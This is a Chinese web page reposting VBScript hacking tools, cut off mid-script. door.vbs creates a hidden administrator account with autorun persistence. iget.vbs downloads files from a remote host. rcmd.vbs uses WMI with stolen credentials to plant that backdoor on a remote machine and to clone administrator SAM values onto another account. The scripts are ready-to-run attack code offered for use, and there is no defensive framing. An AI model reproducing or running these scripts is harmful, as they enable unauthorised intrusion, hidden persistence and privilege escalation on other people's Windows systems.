您现在的位置是:网站首页> 编程资料编程资料
黑客必须要知道的几个vbs文件代码_vbs_
2023-05-25
278人已围观
简介 黑客必须要知道的几个vbs文件代码_vbs_
1. door.vbs
'***************
'door.vbs by 黑嘿黑
'***************
dim wsh,FA,FSO
set fso=CreateObject("Scripting.FileSystemObject")
Set FA= FSO.GetFile(WScript.scriptFullName)
FA.Attributes =34
set wsh=CreateObject("WScript.Shell")
wsh.run "net user IUSE_SERVER xyhack.91i.net /add",0,true
wsh.run "net localgroup administrators IUSE_SERVER /add" ,0,true
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&""
wsh.Regwrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun",""&FA&""
wsh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun",""&FA&""
功能:添加不死帐号(随cmd启动而启动),在win下彻底隐藏。
使用:直接运行。
2. ntlm.vbs
'***************
'ntlm.vbs by 黑嘿黑
'***************
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.regwrite "HKLM\Software\Microsoft\TelnetServer\1.0\NTLM",WScript.Arguments(0),"REG_DWORD"
wsh.regwrite "HKLM\Software\Microsoft\TelnetServer\1.0\TelnetPort",WScript.Arguments(1),"REG_DWORD"
功能:自定义telnet的ntml和端口。
使用:D:\>ntml.vbs 1 999
3. iget.vbs
'***************************
'iget.vbs Mod by 黑嘿黑
'***************************
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile LCase(WScript.Arguments(1)),2
功能:命令行下下载http文件。
使用:D:\>iget.vbs http://xyhack.91i.net/vbs.rar vbs.rar
4. rcmd.vbs
'***************
'rcmd.vbs by 黑嘿黑
'***************
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
end if
if wscript.arguments.count<3 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
usage()
outstreem.write "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator") '20
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
objswbemservices.security_.privileges.add 7,true
objswbemservices.security_.privileges.add 11,true
if errornumber<>0 then
wscript.echo "Error!"
call main()
else
wscript.echo "OK!"
end if
call main()
'***********************************************************
function door()
outstreem.write "Creating the blankdoor .."
set objinstproc=objswbemservices.get("win32_process")
cmddoor="cmd /c echo dim wsh,FA,FSO,t>%windir%\system32\svrer.vbs" _
&"&& echo set fso=CreateObject(""Scripting.FileSystemObject"") >>%windir%\system32\svrer.vbs" _
&"&& echo Set FA= FSO.GetFile(WScript.scriptFullName)>>%windir%\system32\svrer.vbs" _
&"&& echo FA.Attributes =34>>%windir%\system32\svrer.vbs" _
&"&& echo set t=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""net user IUSE_SERVER xyhack.91i.net /add"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""net localgroup administrators IUSE_SERVER /add"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""Attrib +h %windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.Close>>%windir%\system32\svrer.vbs"_
&"&& echo set wsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""net user IUSE_SERVER xyhack.91i.net /add"",0,true>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""net localgroup administrators IUSE_SERVER /add"" ,0,true>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.Regwrite
""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.Regwrite
""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win
dir%\system32\svrer.vbs" _
&"&& echo wsh.regwrite ""HKEY_LOCAL_MACHINE\Software\Microsoft\Command
Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Command
Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""cmd /c at 20:00,20:10,20:20,20:30 %windir%\system32\SYSTEM.bat"",0,true
>>%windir%\system32\svrer.vbs"
objinstproc.create(cmddoor)
showerror(err.number)
Wscript.Sleep(1500)
outstreem.write "Runing the blankdoor .."
objinstproc.create("cmd /c cscript %windir%\system32\svrer.vbs")
showerror(err.number)
call main()
end function
'***********************************************************
function ca()
Wscript.Echo "enter the causername:"
causername=WScript.StdIn.Readline()
Wscript.Echo "enter the capassword:"
capassword=WScript.StdIn.Readline()
outstreem.write "Getting SID of "&causername&" ...."
set colinstsid=objswbemservices.execquery("select * from win32_useraccount where name="&chr(34)&causername&chr(34))
for each objinstsid in colinstsid
strsid=objinstsid.sid
sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))
strflag=cstr(hex(sidflag))
regname=string(8-len(strflag),"0")&strflag
next
if strsid="" then
wscript.echo "Error."&vbcrlf&"Username is not exist."
call main()
else
wscript.echo "OK!"
end if
outstreem.write "Prepairing .."
set objinstproc=objswbemservices.get("win32_process")
showerroronly(err.number)
cmdline="cmd /c echo set oreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs" _
&"&& echo oreg.getbinaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue >>%temp%\ca.vbs" _
&"&& echo oreg.setbinaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\"?name&""",""F"",uvalue >>%temp%\ca.vbs" _
&"&& echo set sh=createobject(""wscript.shell"")>>%temp%\ca.vbs" _
&"&& echo sh.regwrite ""HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\caflag"",""1"" >>%temp%\ca.vbs"
objinstproc.create(cmdline)
showerroronly(err.number)
cmdline="cmd /c echo atime=time>%temp%\getsys.vbs" _
&"&& echo set sh=createobject(""wscript.shell"")>>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c at 23:59 cscript %temp%\ca.vbs"",0,true >>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c time 23:58:59.90"",0,true >>%temp%\getsys.vbs" _
&"&& echo wscript.sleep(1100)>>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c time ""^&atime,0,true >>%temp%\getsys.vbs"
objinstproc.create(cmdline)
showerror(err.number)
outstreem.write "Processing ."
set colinstsvr=objswbemservices.execquery("select * from win32_service where name='schedule'")
showerroronly(err.number)
for each objinstsvr in colinstsvr
flag1=0
flag2=0
if objinstsvr.startmode="Disabled" then
objinstsvr.changestartmode("Manual")
flag1=1
end if
if objinstsvr.started=flase then
errnumber=objinstsvr.startservice()
flag2=1
end if
showerroronly(err.number)
objinstproc.create("cmd /c cscript %temp%\getsys.vbs")
showerroronly(err.number)
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
for i=1 to 20
objinstreg.getstringvalue &h80000002,"SOFTWARE\Microsoft\Windows Script Host\Settings","caflag",svalue
if svalue="1" then
exit for
else
wscript.sleep(500)
end if
next
objinstproc.create("net user "&causername&" "&capassword)
if flag1 then objinstsvr.changestartmode("Disabled")
if flag2 then objinstsvr.stopservice()
next
if svalue<>"1" then
wscript.echo "Error."&vbcrlf&"Waiting time out."
else
showerror(err.number)
end if
outstreem.write "Clean Up .."
objinstproc.create("cmd /c del %temp%\ca.vbs")
showerroronly(err.number)
objinstproc.create("cmd /c del %temp%\getsys.vbs")
showerroronly(err.number)
if svalue="1" then objinstreg.deletevalue &h80000002,"SOFTWARE\Microsoft\Windows Script Host\Settings","caflag"
showerror(err.number)
call main()
end function
function showerroronly(errornumber)
if errornumber Then
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
if err.description <> "" then
wscript.echo "Error description: "&err.description&"."
end if
call main()
else
outstreem.write "."
end if
end function
'***********************************************************
function share()
Wscript.Echo string(18,"-")
Wscript.Echo "0.返回CMD> ="
wscript.echo "1.列出共享信息: ="
Wscript.Echo "2.创建共享 ="
Wscript.Echo "3.删除共享 ="
Wscript.Echo string(18,"-")
Wscript.Echo "please chose the parameter:"
parameters=WScript.StdIn.Readline()
Select Case parameters
case "quit" , "0"
main()
case "list" , "1"
listshare()
case "open" , "2" '40
openshare()
case "close" ,"3"
closeshare()
end Select
end function
function listshare()
outstreem.write "Listing the Netshare from "&ipaddress&"...."
Set colShares = objswbemservices.ExecQuery("Select * from Win32_Share")
showerror(err.number) '50
wscript.echo _
("Caption"&chr(9)&chr(9)&"Name: "&chr(9)
